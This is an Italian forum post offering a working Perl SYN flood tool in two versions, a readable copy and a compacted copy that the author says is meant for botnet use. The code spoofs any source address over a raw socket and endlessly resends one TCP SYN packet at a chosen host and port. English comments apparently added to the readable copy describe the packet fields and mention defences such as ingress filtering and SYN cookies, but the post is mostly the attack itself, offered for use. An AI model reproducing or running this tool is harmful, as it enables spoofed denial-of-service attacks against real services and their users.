| vogy |
| | Ero un po' incasinato su come presentare il programma; in teoria andrebbe usato in botnet, però così il codice fa schifo :O Allora ho pensato di darlo nelle due versioni: 'normale' di prova e contratta da bot. Ricordo che il SYN flood funziona malissimo sotto Windows (tutto il resto va bene, anche Mac) e *richiede privilegi di root* per la creazione di socket SOCK_RAW.
Pulita: CODICE #!/usr/bin/perl -w
# Raw socket SYN flood
use strict; use Socket; use Getopt::Long; our ($s_host, $s_port, $dest_host, $t_host, $t_port, $sock);
# Option handling. With no arguments, or with any of the four options missing,
# usage() ends the script. Both host values are resolved with gethostbyname()
# and element [4] (the first packed address) is kept.
# The source host is a free-form operator value: the address later written into
# the IP header is whatever was passed here, not the sending interface's own
# address. A receiver therefore cannot attribute this traffic from the source
# field alone; anti-spoofing filtering at the sender's network edge
# (BCP 38 / RFC 2827) is the control that keeps such packets from leaving.
my $input_data = $ARGV[0]; if(!defined $input_data) { usage(); } GetOptions ('sh|source-host=s' => \$s_host, 'sp|source-port=i' => \$s_port, 'th|target-host=s' => \$dest_host, 'tp|target-port=i' => \$t_port); if(!defined $s_host or !defined $s_port or !defined $dest_host or !defined $t_port) { usage(); } $s_host = (gethostbyname($s_host))[4]; $t_host = (gethostbyname($dest_host))[4];
# Opens a raw IPv4 socket with protocol number 255 (presumably IPPROTO_RAW, as
# on Linux -- confirm per platform); the post states this step needs root.
# buildpacket() is called exactly once, and the destination sockaddr is packed
# by hand with the 'Sna4x8' template (family, port, address, 8 pad bytes).
socket($sock , AF_INET, SOCK_RAW, 255) || die $!; my($packet) = buildpacket($s_host, $s_port, $t_host, $t_port); # http://perldoc.perl.org/functions/pack.html my($target) = pack('Sna4x8', AF_INET, $t_port, $t_host);
# Endless loop: the same pre-built $packet is sent on every iteration, with no
# delay and no counter; one status line is printed per send and the first
# failed send() ends the script via die.
# Receiving side: the usual controls for this class of traffic are SYN cookies
# and rate limiting or filtering on the header fields, which never change
# within a run because the datagram is built only once.
while (1) { send($sock , $packet , 0 , $target) || die "no socket send!\n"; print "send socket...\n"; }
# usage: prints the option summary to STDOUT and then terminates the script
# with die (the final line of the summary goes to STDERR as the die message).
# It never returns to its caller.
sub usage { print "\nUsage: $0 -sh|--source-host <host> -sp|--source-port <port> th|target-host <host> tp|target-port <port>\n\n"; print "-sh|--source-host <host> host sending syn-flood, choose any :-)\n"; print "-sp|--source-port <port> port (on source-host) sending syn-flood... choose any\n"; print "-th|--target-host <host> host to flood\n"; die "-tp|--target-port <port> port (on target-host) syn-flooded\n\n"; }
# buildpacket: assembles one 40-byte datagram (20-byte IPv4 header followed by a
# 20-byte TCP header, no payload) and returns it as a byte string.
# The sub does not unpack @_; the ports and packed addresses are read from the
# file-level $s_port, $t_port, $s_host and $t_host variables.
#
# First the TCP header is packed with its checksum field set to 0, and a
# pseudo-header (source address, destination address, zero byte, protocol 6,
# TCP length) is prepended to it as input for checksum().
#
# Defender note: apart from the addresses, the ports and the resulting
# checksum, every field is a literal constant -- TCP sequence number 13456,
# acknowledgement 0, window 124, IP identification 19245, TTL 25, total
# length 40. Because the caller builds the datagram once and re-sends it,
# traffic from this listing is byte-identical within a run and can be matched
# by a static filter or IDS rule on those fields.
sub buildpacket { # reference: http://sock-raw.org/papers/sock_raw # not checksum [=0] my $temp_header = pack('nnNNH2B8nvn', $s_port, $t_port, 13456, 0, 50, 00000010, 124, 0, 44 ); my $tcp_form = pack('a4a4CCn', $s_host, $t_host, 0, 6, length($temp_header) ) . $temp_header;
# Internet checksum over pseudo-header + TCP header (checksum field still 0).
my $checked_tcp = &checksum($tcp_form);
# The TCP header is packed a second time with the computed checksum in place
# ('v' template, i.e. little-endian 16-bit). The IPv4 header follows: first
# byte 0x45 (version 4, header length 5 words), protocol 6 (TCP), and the IP
# header checksum field packed as 0. The result is IP header . TCP header.
my $tcp_header = pack( 'nnNNH2B8nvn', $s_port, $t_port, 13456, 0, 50, 00000010, 124, $checked_tcp, 44 ); my $ip_header = pack('H2CnnB16CCna4a4', 45, 00, 40, 19245, "0100000000000000", 25, 6, 0, $s_host, $t_host); my $raw_packet = $ip_header.$tcp_header; return $raw_packet }
# checksum: 16-bit ones'-complement sum of a byte string (the Internet checksum
# used by IP and TCP headers).
#   $msg    - byte string to sum
#   returns - integer in the range 0..0xffff
# The string is read as unsigned 16-bit words in the platform's native byte
# order (unpack template "S"); when the length is odd the last byte is added
# on its own. Carry bits above bit 15 are folded back into the low word, and
# the complement of the folded sum, masked to 16 bits, is returned.
# NOTE(review): on this page the same physical line also carries the author's
# "Contratta" (compacted) copy of the whole script and the closing P.S.; both
# are left exactly as posted.
sub checksum { # default function by W. Richard Stevens.
my ($msg) = @_; my ($len_msg,$num_short,$short,$chk); $len_msg = length($msg); $num_short = $len_msg / 2; $chk = 0; foreach $short (unpack("S$num_short", $msg)) { $chk += $short; } $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2; $chk = ($chk >> 16) + ($chk & 0xffff); return(~(($chk >> 16) + $chk) & 0xffff); } Contratta: CODICE #!/usr/bin/perl # Raw socket SYN flood #usage: $0 <source host> <source port> <target host> <target port> use strict;use Socket;our ($sock); my $s_host=(gethostbyname($ARGV[0]))[4];my $s_port=$ARGV[1]; my $t_host=(gethostbyname($ARGV[2]))[4];my $t_port=$ARGV[3]; socket($sock ,AF_INET,SOCK_RAW,255) || die; my($packet)=buildpacket($s_host,$s_port,$t_host,$t_port); my($target)=pack('Sna4x8',AF_INET,$t_port,$t_host); while (1) {send($sock ,$packet ,0 ,$target) || die;} sub buildpacket { my $temp_header=pack('nnNNH2B8nvn',$s_port,$t_port,13456,0,50,00000010,124,0,44 ); my $tcp_form=pack('a4a4CCn',$s_host,$t_host,0,6,length($temp_header) ) . $temp_header; my $checked_tcp=&checksum($tcp_form); my $tcp_header=pack( 'nnNNH2B8nvn',$s_port,$t_port,13456,0,50,00000010,124,$checked_tcp,44 ); my $ip_header=pack('H2CnnB16CCna4a4',45,00,40,19245,"0100000000000000",25,6,0,$s_host,$t_host); my $raw_packet=$ip_header.$tcp_header;return $raw_packet } sub checksum {my ($msg)=@_;my ($len_msg,$num_short,$short,$chk);$len_msg=length($msg); $num_short=$len_msg / 2;$chk=0;foreach $short (unpack("S$num_short",$msg)) { $chk += $short;} $chk += unpack("C",substr($msg,$len_msg - 1,1)) if $len_msg % 2;$chk=($chk >> 16) + ($chk & 0xffff); return(~(($chk >> 16) + $chk) & 0xffff);} P.S. È un bel sorcio (con link alle reference), Non Ci Fate Caxxate...